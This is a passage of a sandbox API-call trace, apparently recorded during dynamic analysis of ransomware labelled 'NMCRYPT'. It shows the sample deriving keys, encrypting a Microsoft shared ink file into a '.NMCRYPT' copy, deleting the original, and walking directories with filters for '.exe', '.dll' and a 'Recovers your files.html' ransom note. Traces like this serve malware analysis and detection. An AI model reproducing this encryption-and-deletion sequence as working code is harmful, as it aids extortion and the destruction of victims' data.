(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.034] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0148.034] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0148.034] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0148.034] CryptHashData (hHash=0x9ad438, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.034] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad838) returned 1 [0148.035] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0148.035] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0148.035] wcslen (_String="\\\\?\\") returned 0x4 [0148.035] CryptDuplicateKey (in: hKey=0x9ad838, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad6b8) returned 1 [0148.035] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.035] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.035] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2720) returned 1 [0148.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0148.036] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.037] GetLastError () returned 0x0 [0148.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.067] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.067] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.067] GetLastError () returned 0x0 [0148.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.067] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.067] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.067] GetLastError () returned 0x0 [0148.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.068] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.068] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.068] GetLastError () returned 0x0 [0148.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.068] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.068] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.068] GetLastError () returned 0x0 [0148.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.068] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.068] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.068] GetLastError () returned 0x0 [0148.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.068] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.068] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.068] GetLastError () returned 0x0 [0148.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.068] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.068] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.068] GetLastError () returned 0x0 [0148.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.069] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.069] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.069] GetLastError () returned 0x0 [0148.069] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.069] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.069] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.069] GetLastError () returned 0x0 [0148.069] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.069] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xa0, lpOverlapped=0x0) returned 1 [0148.069] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xa0, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xb0) returned 1 [0148.069] GetLastError () returned 0x0 [0148.069] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xb0, lpOverlapped=0x0) returned 1 [0148.069] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0148.069] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0148.069] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml")) returned 0x20 [0148.069] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml", dwFileAttributes=0x20) returned 0 [0148.070] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 1 [0148.070] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml")) returned 0 [0148.070] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" [0148.070] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0148.070] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB552.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb552.tmp")) returned 0xb552 [0148.070] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB552.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb552.tmp"), dwFlags=0x1) returned 0 [0148.071] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB552.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb552.tmp")) returned 1 [0148.071] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0148.071] wcslen (_String="OK") returned 0x2 [0148.071] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.071] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.071] CryptDestroyKey (hKey=0x9ad838) returned 1 [0148.071] CryptDestroyHash (hHash=0x9ad438) returned 1 [0148.071] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0148.071] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.071] wcscmp (_String1="it-IT", _String2=".") returned 1 [0148.071] wcscmp (_String1="it-IT", _String2="..") returned 1 [0148.071] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.071] wcscmp (_String1="ja-JP", _String2=".") returned 1 [0148.071] wcscmp (_String1="ja-JP", _String2="..") returned 1 [0148.071] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.071] PathMatchSpecW (pszFile="journal.dll", pszSpec="*NMCRYPT") returned 0 [0148.071] PathMatchSpecW (pszFile="journal.dll", pszSpec="*Recovers your files.html") returned 0 [0148.071] PathMatchSpecW (pszFile="journal.dll", pszSpec="*.exe") returned 0 [0148.071] PathMatchSpecW (pszFile="journal.dll", pszSpec="*.dll") returned 1 [0148.071] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.071] wcscmp (_String1="ko-KR", _String2=".") returned 1 [0148.071] wcscmp (_String1="ko-KR", _String2="..") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] wcscmp (_String1="LanguageModel", _String2=".") returned 1 [0148.072] wcscmp (_String1="LanguageModel", _String2="..") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] wcscmp (_String1="lt-LT", _String2=".") returned 1 [0148.072] wcscmp (_String1="lt-LT", _String2="..") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] wcscmp (_String1="lv-LV", _String2=".") returned 1 [0148.072] wcscmp (_String1="lv-LV", _String2="..") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] PathMatchSpecW (pszFile="micaut.dll", pszSpec="*NMCRYPT") returned 0 [0148.072] PathMatchSpecW (pszFile="micaut.dll", pszSpec="*Recovers your files.html") returned 0 [0148.072] PathMatchSpecW (pszFile="micaut.dll", pszSpec="*.exe") returned 0 [0148.072] PathMatchSpecW (pszFile="micaut.dll", pszSpec="*.dll") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] PathMatchSpecW (pszFile="Microsoft.Ink.dll", pszSpec="*NMCRYPT") returned 0 [0148.072] PathMatchSpecW (pszFile="Microsoft.Ink.dll", pszSpec="*Recovers your files.html") returned 0 [0148.072] PathMatchSpecW (pszFile="Microsoft.Ink.dll", pszSpec="*.exe") returned 0 [0148.072] PathMatchSpecW (pszFile="Microsoft.Ink.dll", pszSpec="*.dll") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] PathMatchSpecW (pszFile="mip.exe", pszSpec="*NMCRYPT") returned 0 [0148.072] PathMatchSpecW (pszFile="mip.exe", pszSpec="*Recovers your files.html") returned 0 [0148.072] PathMatchSpecW (pszFile="mip.exe", pszSpec="*.exe") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] PathMatchSpecW (pszFile="mraut.dll", pszSpec="*NMCRYPT") returned 0 [0148.072] PathMatchSpecW (pszFile="mraut.dll", pszSpec="*Recovers your files.html") returned 0 [0148.072] PathMatchSpecW (pszFile="mraut.dll", pszSpec="*.exe") returned 0 [0148.072] PathMatchSpecW (pszFile="mraut.dll", pszSpec="*.dll") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] PathMatchSpecW (pszFile="mshwgst.dll", pszSpec="*NMCRYPT") returned 0 [0148.072] PathMatchSpecW (pszFile="mshwgst.dll", pszSpec="*Recovers your files.html") returned 0 [0148.072] PathMatchSpecW (pszFile="mshwgst.dll", pszSpec="*.exe") returned 0 [0148.072] PathMatchSpecW (pszFile="mshwgst.dll", pszSpec="*.dll") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] PathMatchSpecW (pszFile="mshwLatin.dll", pszSpec="*NMCRYPT") returned 0 [0148.072] PathMatchSpecW (pszFile="mshwLatin.dll", pszSpec="*Recovers your files.html") returned 0 [0148.072] PathMatchSpecW (pszFile="mshwLatin.dll", pszSpec="*.exe") returned 0 [0148.072] PathMatchSpecW (pszFile="mshwLatin.dll", pszSpec="*.dll") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] wcscmp (_String1="nb-NO", _String2=".") returned 1 [0148.072] wcscmp (_String1="nb-NO", _String2="..") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.072] wcscmp (_String1="nl-NL", _String2=".") returned 1 [0148.072] wcscmp (_String1="nl-NL", _String2="..") returned 1 [0148.072] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="pl-PL", _String2=".") returned 1 [0148.073] wcscmp (_String1="pl-PL", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="pt-BR", _String2=".") returned 1 [0148.073] wcscmp (_String1="pt-BR", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="pt-PT", _String2=".") returned 1 [0148.073] wcscmp (_String1="pt-PT", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="ro-RO", _String2=".") returned 1 [0148.073] wcscmp (_String1="ro-RO", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] PathMatchSpecW (pszFile="rtscom.dll", pszSpec="*NMCRYPT") returned 0 [0148.073] PathMatchSpecW (pszFile="rtscom.dll", pszSpec="*Recovers your files.html") returned 0 [0148.073] PathMatchSpecW (pszFile="rtscom.dll", pszSpec="*.exe") returned 0 [0148.073] PathMatchSpecW (pszFile="rtscom.dll", pszSpec="*.dll") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="ru-RU", _String2=".") returned 1 [0148.073] wcscmp (_String1="ru-RU", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] PathMatchSpecW (pszFile="ShapeCollector.exe", pszSpec="*NMCRYPT") returned 0 [0148.073] PathMatchSpecW (pszFile="ShapeCollector.exe", pszSpec="*Recovers your files.html") returned 0 [0148.073] PathMatchSpecW (pszFile="ShapeCollector.exe", pszSpec="*.exe") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="sk-SK", _String2=".") returned 1 [0148.073] wcscmp (_String1="sk-SK", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="sl-SI", _String2=".") returned 1 [0148.073] wcscmp (_String1="sl-SI", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="sr-Latn-CS", _String2=".") returned 1 [0148.073] wcscmp 